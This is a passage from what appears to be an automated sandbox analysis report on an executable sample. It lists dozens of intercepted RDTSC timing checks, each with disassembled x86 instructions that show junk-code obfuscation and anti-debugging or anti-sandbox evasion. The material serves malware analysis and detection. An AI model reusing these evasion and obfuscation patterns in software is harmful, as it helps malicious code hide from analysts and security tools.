Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D78432 second address: D78438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D78438 second address: D7843C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D7843C second address: D78464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007F953D46EDA8h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D78464 second address: D78491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F953D015236h 0x0000000a jl 00007F953D015236h 0x00000010 popad 0x00000011 jmp 00007F953D015244h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F953D015236h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D78491 second address: D78497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D77D9A second address: D77DCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 jmp 00007F953D015243h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D77DCA second address: D77DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D88FFC second address: D89006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D88E17 second address: D88E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D88E1C second address: D88E28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D88E28 second address: D88E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D8C236 second address: D8C23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D9116F second address: D91175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D9171A second address: D9171F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D91847 second address: D9184B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D9184B second address: D91851 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D91851 second address: D9185B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F953D46ED96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D919B3 second address: D919B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D91B27 second address: D91B33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F953D46ED96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D951EE second address: D95205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D015243h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D94D81 second address: D94DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F953D46ED96h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F953D46EDA6h 0x00000012 jnl 00007F953D46ED96h 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D94ECA second address: D94ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D94ECE second address: D94EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D94EDA second address: D94EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D94EDE second address: D94EE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D94EE4 second address: D94F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D015244h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D94F00 second address: D94F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D94F04 second address: D94F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F953D015236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: DD5419 second address: DD541D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: DD541D second address: DD543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F953D015244h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: DE4EF4 second address: DE4EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F953D46ED96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: DE4EFF second address: DE4F04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: DE4F04 second address: DE4F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: DE7987 second address: DE7991 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F953D01523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB5658 second address: EB567B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F953D46ED96h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F953D46EDA0h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB567B second address: EB567F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB5AA7 second address: EB5AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB5C47 second address: EB5C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D015240h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB5C5C second address: EB5C7E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F953D46EDADh 0x00000008 jmp 00007F953D46EDA7h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB5F29 second address: EB5F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F953D015238h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F953D015236h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB622C second address: EB6232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB6232 second address: EB6243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F953D015236h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB6243 second address: EB6260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB63D3 second address: EB63EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015242h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB931C second address: EB9326 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB9393 second address: EB9397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB9397 second address: EB93BE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F953D46EDA9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB93BE second address: EB93C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB93C4 second address: EB93C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB93C8 second address: EB93FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or dword ptr [ebp+122D336Eh], edx 0x0000000f and dx, 8DF4h 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D30A5h] 0x0000001c push 851704EFh 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F953D015243h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB9636 second address: EB963A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: EB963A second address: EB964C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D007A second address: 71D0080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0080 second address: 71D00AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F953D015247h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D00AA second address: 71D00B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D00B0 second address: 71D00C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F953D01523Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D00C6 second address: 71D00CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D00CC second address: 71D00F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F953D015244h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D00F0 second address: 71D016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46EDA1h 0x00000009 add ch, FFFFFF86h 0x0000000c jmp 00007F953D46EDA1h 0x00000011 popfd 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 sub esp, 18h 0x0000001b pushad 0x0000001c jmp 00007F953D46EDA9h 0x00000021 pushfd 0x00000022 jmp 00007F953D46EDA0h 0x00000027 sbb esi, 412A6188h 0x0000002d jmp 00007F953D46ED9Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ebx, 25B0ADF6h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D016C second address: 71D0171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0171 second address: 71D01FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F953D46ED9Bh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F953D46EDA6h 0x00000015 mov ebx, dword ptr [eax+10h] 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c push ebx 0x0000001d call 00007F953D46EDA6h 0x00000022 pop esi 0x00000023 pop ebx 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F953D46EDA3h 0x0000002f xor ah, FFFFFFEEh 0x00000032 jmp 00007F953D46EDA9h 0x00000037 popfd 0x00000038 movzx ecx, bx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D01FC second address: 71D0220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F953D01523Bh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 7B4DBB2Dh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0220 second address: 71D0281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F953D46EDA9h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, dword ptr [775606ECh] 0x00000012 jmp 00007F953D46ED9Ah 0x00000017 test esi, esi 0x00000019 jmp 00007F953D46EDA0h 0x0000001e jne 00007F953D46FC0Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F953D46EDA7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0281 second address: 71D0286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0286 second address: 71D02D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F953D46EDA5h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F953D46EDA8h 0x00000017 sub esi, 3B962948h 0x0000001d jmp 00007F953D46ED9Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D02D2 second address: 71D032B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], edi 0x00000008 jmp 00007F953D015240h 0x0000000d call dword ptr [77530B60h] 0x00000013 mov eax, 756AE5E0h 0x00000018 ret 0x00000019 jmp 00007F953D015240h 0x0000001e push 00000044h 0x00000020 pushad 0x00000021 mov ax, 606Dh 0x00000025 call 00007F953D01523Ah 0x0000002a mov ax, A9A1h 0x0000002e pop ecx 0x0000002f popad 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F953D01523Fh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D032B second address: 71D0348 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0348 second address: 71D0364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0432 second address: 71D046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F953D46EDA8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D046D second address: 71D047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D047C second address: 71D04A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F953D46ED9Fh 0x00000008 pop ecx 0x00000009 mov bh, 00h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F953D46ED9Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D04A4 second address: 71D04B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D04B3 second address: 71D04CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 7E62CECAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F95AD77DF7Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ebx 0x00000018 mov al, 36h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D04CE second address: 71D050E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d jmp 00007F953D015245h 0x00000012 mov dword ptr [esi], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F953D015248h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D050E second address: 71D0514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0514 second address: 71D053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 jmp 00007F953D015248h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D053D second address: 71D0541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0541 second address: 71D0547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0547 second address: 71D0556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D46ED9Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0556 second address: 71D0573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D015240h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0573 second address: 71D05BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 pushfd 0x00000011 jmp 00007F953D46EDA1h 0x00000016 add cx, E5D6h 0x0000001b jmp 00007F953D46EDA1h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx ecx, dx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D05BC second address: 71D05E6 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 6E6Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movsx ebx, ax 0x0000000b popad 0x0000000c mov dword ptr [esi+10h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F953D015249h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D05E6 second address: 71D05ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D05ED second address: 71D0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+50h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F953D01523Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0604 second address: 71D061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D46EDA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D061C second address: 71D0639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 movsx edx, cx 0x00000016 popad 0x00000017 rdtsc
